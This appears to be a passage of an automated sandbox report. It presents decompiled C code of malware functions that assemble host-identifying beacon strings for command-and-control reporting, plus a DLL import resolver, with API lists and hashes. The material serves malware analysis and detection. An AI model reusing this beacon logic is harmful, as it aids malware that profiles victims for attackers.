                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 25f02d415504f5b88b0e5bec5c1a624b47950c8d6d800e1832f7d8e9bf0a6de1
                                                          • Instruction ID: a7e295e2a91ff7aff197b60c7441366844532afbac073ce0b1f8ae73029fd834
                                                          • Opcode Fuzzy Hash: 25f02d415504f5b88b0e5bec5c1a624b47950c8d6d800e1832f7d8e9bf0a6de1
                                                          • Instruction Fuzzy Hash: 93718EB4B00115AFEB10FBF99D84A6B77EFDB48700729C961A506D7284E634FE819B30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C01F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E04C01F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x4c0d018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x4c0d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x4c0d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E04C0D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x4c0d2a8; // 0x1c7a5a8
				_t3 = _t30 + 0x4c0e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x4c0d02c,  *0x4c0d004, _t25);
				_t33 = E04C056CD();
				_t34 =  *0x4c0d2a8; // 0x1c7a5a8
				_t4 = _t34 + 0x4c0e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E04C058DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x4c0d2a8; // 0x1c7a5a8
					_t6 = _t83 + 0x4c0e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x4c0d238, 0, _t96);
				}
				_t97 = E04C0A199();
				if(_t97 != 0) {
					_t78 =  *0x4c0d2a8; // 0x1c7a5a8
					_t8 = _t78 + 0x4c0e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x4c0d238, 0, _t97);
				}
				_t98 =  *0x4c0d32c; // 0x68895b0
				_a32 = E04C04622(0x4c0d00a, _t98 + 4);
				_t42 =  *0x4c0d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x4c0d2a8; // 0x1c7a5a8
					_t11 = _t74 + 0x4c0e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x4c0d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x4c0d2a8; // 0x1c7a5a8
					_t13 = _t71 + 0x4c0e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
					if(_t100 != 0) {
						E04C0518F(GetTickCount());
						_t50 =  *0x4c0d32c; // 0x68895b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x4c0d32c; // 0x68895b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x4c0d32c; // 0x68895b0
						_t103 = E04C01BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x4c0c28c);
							_push(_t103);
							_t62 = E04C0361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04C06777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04C06761();
								}
								HeapFree( *0x4c0d238, 0, _v44);
							}
							HeapFree( *0x4c0d238, 0, _t103);
						}
						HeapFree( *0x4c0d238, 0, _t100);
					}
					HeapFree( *0x4c0d238, 0, _a24);
				}
				HeapFree( *0x4c0d238, 0, _t105);
				return _a12;
			}
















































                                                          0x04c01f13
                                                          0x04c01f13
                                                          0x04c01f13
                                                          0x04c01f18
                                                          0x04c01f1e
                                                          0x04c01f28
                                                          0x04c01f2a
                                                          0x04c01f2a
                                                          0x04c01f37
                                                          0x04c01f42
                                                          0x04c01f45
                                                          0x04c01f50
                                                          0x04c01f53
                                                          0x04c01f58
                                                          0x04c01f5b
                                                          0x04c01f60
                                                          0x04c01f63
                                                          0x04c01f6f
                                                          0x04c01f7c
                                                          0x04c01f7e
                                                          0x04c01f84
                                                          0x04c01f89
                                                          0x04c01f94
                                                          0x04c01f96
                                                          0x04c01f99
                                                          0x04c01fa0
                                                          0x04c01fa4
                                                          0x04c01fa6
                                                          0x04c01fab
                                                          0x04c01fb7
                                                          0x04c01fb9
                                                          0x04c01fc5
                                                          0x04c01fc7
                                                          0x04c01fc7
                                                          0x04c01fd2
                                                          0x04c01fd6
                                                          0x04c01fd8
                                                          0x04c01fdd
                                                          0x04c01fe9
                                                          0x04c01feb
                                                          0x04c01ff7
                                                          0x04c01ff9
                                                          0x04c01ff9
                                                          0x04c01fff
                                                          0x04c02012
                                                          0x04c02016
                                                          0x04c0201d
                                                          0x04c02020
                                                          0x04c02025
                                                          0x04c02030
                                                          0x04c02032
                                                          0x04c02035
                                                          0x04c02035
                                                          0x04c02037
                                                          0x04c0203e
                                                          0x04c02041
                                                          0x04c02046
                                                          0x04c02050
                                                          0x04c02052
                                                          0x04c0205a
                                                          0x04c02073
                                                          0x04c02077
                                                          0x04c02083
                                                          0x04c02088
                                                          0x04c02091
                                                          0x04c020a2
                                                          0x04c020a6
                                                          0x04c020af
                                                          0x04c020b5
                                                          0x04c020c2
                                                          0x04c020cf
                                                          0x04c020d5
                                                          0x04c020e1
                                                          0x04c020e7
                                                          0x04c020e8
                                                          0x04c020ed
                                                          0x04c020f3
                                                          0x04c020f9
                                                          0x04c02100
                                                          0x04c02107
                                                          0x04c0210d
                                                          0x04c02114
                                                          0x04c02118
                                                          0x04c02123
                                                          0x04c02128
                                                          0x04c0212e
                                                          0x04c02137
                                                          0x04c02137
                                                          0x04c02148
                                                          0x04c02148
                                                          0x04c02157
                                                          0x04c02157
                                                          0x04c02166
                                                          0x04c02166
                                                          0x04c02178
                                                          0x04c02178
                                                          0x04c02187
                                                          0x04c02198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04C01F2A
                                                          • wsprintfA.USER32 ref: 04C01F77
                                                          • wsprintfA.USER32 ref: 04C01F94
                                                          • wsprintfA.USER32 ref: 04C01FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C01FC7
                                                          • wsprintfA.USER32 ref: 04C01FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C01FF9
                                                          • wsprintfA.USER32 ref: 04C02030
                                                          • wsprintfA.USER32 ref: 04C02050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C0206D
                                                          • GetTickCount.KERNEL32 ref: 04C0207D
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C02091
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C020AF
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?,068895B0), ref: 04C01BE1
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(?,?,?,04C020C2,?,068895B0), ref: 04C01BE9
                                                            • Part of subcall function 04C01BB6: strcpy.NTDLL ref: 04C01C00
                                                            • Part of subcall function 04C01BB6: lstrcat.KERNEL32(00000000,?), ref: 04C01C0B
                                                            • Part of subcall function 04C01BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C01C28
                                                          • StrTrimA.SHLWAPI(00000000,04C0C28C,?,068895B0), ref: 04C020E1
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(06889A78,00000000,00000000,7742C740,04C020ED,00000000), ref: 04C0362A
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(?), ref: 04C03632
                                                            • Part of subcall function 04C0361A: lstrcpy.KERNEL32(00000000,06889A78), ref: 04C03646
                                                            • Part of subcall function 04C0361A: lstrcat.KERNEL32(00000000,?), ref: 04C03651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C02100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C02107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04C02114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04C02118
                                                            • Part of subcall function 04C06777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04C06829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04C02148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04C02157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,068895B0), ref: 04C02166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C02178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C02187
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 6fd3d43a32a1f9629b3020b6c98aaef79863c1c13c1397b9bf63a664e6454227
                                                          • Instruction ID: 5897f6038c573263182c2f26e6984f9b3d780ab3d2e34a53b6a4b4e4c91e8770
                                                          • Opcode Fuzzy Hash: 6fd3d43a32a1f9629b3020b6c98aaef79863c1c13c1397b9bf63a664e6454227
                                                          • Instruction Fuzzy Hash: AA61E739500200AFE711DBA8EC48F6677F9EB48744F064614FA0AD72A0DB3DED85DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C04AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04C04AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x4c0d018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x4c0d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x4c0d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E04C0D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x4c0d2a8; // 0x1c7a5a8
				_t3 = _t64 + 0x4c0e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x4c0d02c,  *0x4c0d004, _t59);
				_t67 = E04C056CD();
				_t68 =  *0x4c0d2a8; // 0x1c7a5a8
				_t4 = _t68 + 0x4c0e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E04C058DB(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x4c0d2a8; // 0x1c7a5a8
					_t7 = _t126 + 0x4c0e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x4c0d238, 0, _v8);
				}
				_t73 = E04C0A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x4c0d2a8; // 0x1c7a5a8
					_t11 = _t121 + 0x4c0e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x4c0d238, 0, _v8);
				}
				_t146 =  *0x4c0d32c; // 0x68895b0
				_t75 = E04C04622(0x4c0d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x4c0d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x4c0d238, _t152, _v20);
						goto L26;
					}
					E04C0518F(GetTickCount());
					_t82 =  *0x4c0d32c; // 0x68895b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x4c0d32c; // 0x68895b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x4c0d32c; // 0x68895b0
					_t148 = E04C01BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x4c0d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x4c0c28c);
					_push(_t148);
					_t94 = E04C0361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x4c0d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04C09070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04C06761();
						L22:
						HeapFree( *0x4c0d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E04C069B4(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E04C0391F(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E04C0A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04C05800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04C0A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                          0x04c04ab6
                                                          0x04c04ab6
                                                          0x04c04ab6
                                                          0x04c04abf
                                                          0x04c04ac8
                                                          0x04c04aca
                                                          0x04c04aca
                                                          0x04c04ad7
                                                          0x04c04ae2
                                                          0x04c04ae5
                                                          0x04c04aea
                                                          0x04c04af3
                                                          0x04c04af6
                                                          0x04c04afb
                                                          0x04c04afe
                                                          0x04c04b03
                                                          0x04c04b06
                                                          0x04c04b12
                                                          0x04c04b1f
                                                          0x04c04b21
                                                          0x04c04b27
                                                          0x04c04b2c
                                                          0x04c04b37
                                                          0x04c04b39
                                                          0x04c04b3c
                                                          0x04c04b3e
                                                          0x04c04b43
                                                          0x04c04b49
                                                          0x04c04b4e
                                                          0x04c04b51
                                                          0x04c04b56
                                                          0x04c04b63
                                                          0x04c04b65
                                                          0x04c04b6b
                                                          0x04c04b75
                                                          0x04c04b75
                                                          0x04c04b77
                                                          0x04c04b7c
                                                          0x04c04b81
                                                          0x04c04b84
                                                          0x04c04b89
                                                          0x04c04b96
                                                          0x04c04b98
                                                          0x04c04ba6
                                                          0x04c04ba6
                                                          0x04c04ba8
                                                          0x04c04bb6
                                                          0x04c04bbb
                                                          0x04c04bbd
                                                          0x04c04bc2
                                                          0x04c04d83
                                                          0x04c04d8d
                                                          0x04c04d96
                                                          0x04c04bc8
                                                          0x04c04bd4
                                                          0x04c04bda
                                                          0x04c04bdf
                                                          0x04c04d77
                                                          0x04c04d81
                                                          0x00000000
                                                          0x04c04d81
                                                          0x04c04beb
                                                          0x04c04bf0
                                                          0x04c04bf9
                                                          0x04c04c0a
                                                          0x04c04c0e
                                                          0x04c04c17
                                                          0x04c04c1d
                                                          0x04c04c2c
                                                          0x04c04c33
                                                          0x04c04c3c
                                                          0x04c04c42
                                                          0x04c04d6b
                                                          0x04c04d75
                                                          0x00000000
                                                          0x04c04d75
                                                          0x04c04c4e
                                                          0x04c04c54
                                                          0x04c04c55
                                                          0x04c04c5a
                                                          0x04c04c5f
                                                          0x04c04d61
                                                          0x04c04d69
                                                          0x00000000
                                                          0x04c04d69
                                                          0x04c04c68
                                                          0x04c04c6f
                                                          0x04c04c77
                                                          0x04c04c7c
                                                          0x04c04c85
                                                          0x04c04c90
                                                          0x04c04c95
                                                          0x04c04c9a
                                                          0x04c04d99
                                                          0x04c04d4d
                                                          0x04c04d4d
                                                          0x04c04d52
                                                          0x04c04d5d
                                                          0x04c04d5f
                                                          0x00000000
                                                          0x04c04d5f
                                                          0x04c04ca4
                                                          0x04c04ca9
                                                          0x04c04cae
                                                          0x04c04cb3
                                                          0x04c04cc3
                                                          0x04c04cc6
                                                          0x04c04ccc
                                                          0x04c04cd2
                                                          0x04c04cd8
                                                          0x04c04cdb
                                                          0x04c04ce1
                                                          0x04c04ce4
                                                          0x04c04ce9
                                                          0x04c04ced
                                                          0x04c04ced
                                                          0x04c04cf9
                                                          0x04c04d05
                                                          0x04c04d09
                                                          0x04c04d0b
                                                          0x04c04d10
                                                          0x04c04d12
                                                          0x04c04d17
                                                          0x04c04d1c
                                                          0x04c04d29
                                                          0x04c04d31
                                                          0x04c04d34
                                                          0x04c04d34
                                                          0x04c04d10
                                                          0x00000000
                                                          0x04c04cfb
                                                          0x04c04cff
                                                          0x04c04d36
                                                          0x04c04d39
                                                          0x04c04d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c04d42
                                                          0x04c04d01
                                                          0x00000000
                                                          0x04c04d01
                                                          0x04c04cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04C04ACA
                                                          • wsprintfA.USER32 ref: 04C04B1A
                                                          • wsprintfA.USER32 ref: 04C04B37
                                                          • wsprintfA.USER32 ref: 04C04B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04B75
                                                          • wsprintfA.USER32 ref: 04C04B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C04BD4
                                                          • GetTickCount.KERNEL32 ref: 04C04BE5
                                                          • RtlEnterCriticalSection.NTDLL(06889570), ref: 04C04BF9
                                                          • RtlLeaveCriticalSection.NTDLL(06889570), ref: 04C04C17
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?,068895B0), ref: 04C01BE1
                                                            • Part of subcall function 04C01BB6: lstrlen.KERNEL32(?,?,?,04C020C2,?,068895B0), ref: 04C01BE9
                                                            • Part of subcall function 04C01BB6: strcpy.NTDLL ref: 04C01C00
                                                            • Part of subcall function 04C01BB6: lstrcat.KERNEL32(00000000,?), ref: 04C01C0B
                                                            • Part of subcall function 04C01BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C01C28
                                                          • StrTrimA.SHLWAPI(00000000,04C0C28C,?,068895B0), ref: 04C04C4E
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(06889A78,00000000,00000000,7742C740,04C020ED,00000000), ref: 04C0362A
                                                            • Part of subcall function 04C0361A: lstrlen.KERNEL32(?), ref: 04C03632
                                                            • Part of subcall function 04C0361A: lstrcpy.KERNEL32(00000000,06889A78), ref: 04C03646
                                                            • Part of subcall function 04C0361A: lstrcat.KERNEL32(00000000,?), ref: 04C03651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C04C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04C04C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04C04C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04C04C8B
                                                            • Part of subcall function 04C09070: lstrlen.KERNEL32(?,00000000,06889A98,00000000,04C08808,06889C76,?,?,?,?,?,63699BC3,00000005,04C0D00C), ref: 04C09077
                                                            • Part of subcall function 04C09070: mbstowcs.NTDLL ref: 04C090A0
                                                            • Part of subcall function 04C09070: memset.NTDLL ref: 04C090B2
                                                          • wcstombs.NTDLL ref: 04C04D1C
                                                            • Part of subcall function 04C0391F: SysAllocString.OLEAUT32(?), ref: 04C0395A
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04C04D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04C04D69
                                                          • HeapFree.KERNEL32(00000000,?,?,068895B0), ref: 04C04D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04D81
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04C04D8D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 3748877296-0
                                                          • Opcode ID: 0cf46fa75315930a54437b2059875f88cd32973bded0c031304a2f8530e8cbcf
                                                          • Instruction ID: bf264c44174af88b16e448e4ee3f7f7104fb504107280a93ee8fd79c557d7f71
                                                          • Opcode Fuzzy Hash: 0cf46fa75315930a54437b2059875f88cd32973bded0c031304a2f8530e8cbcf
                                                          • Instruction Fuzzy Hash: 98916B75900208BFDB15DFA8DC88AAE7BBAEF08314F158054F506D72A0DB35EE91DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E04C0AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4c00000;
				_t115 = _t139[3] + 0x4c00000;
				_t131 = _t139[4] + 0x4c00000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4c00000;
				_v16 = _t139[5] + 0x4c00000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4c00002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4c0d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4c0d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4c0d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4c0d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4c0d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4c0d198; // 0x0
										 *_t102 = _t125;
										 *0x4c0d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4c0d19c; // 0x0
						if(_t104 == 0) {
							L12:
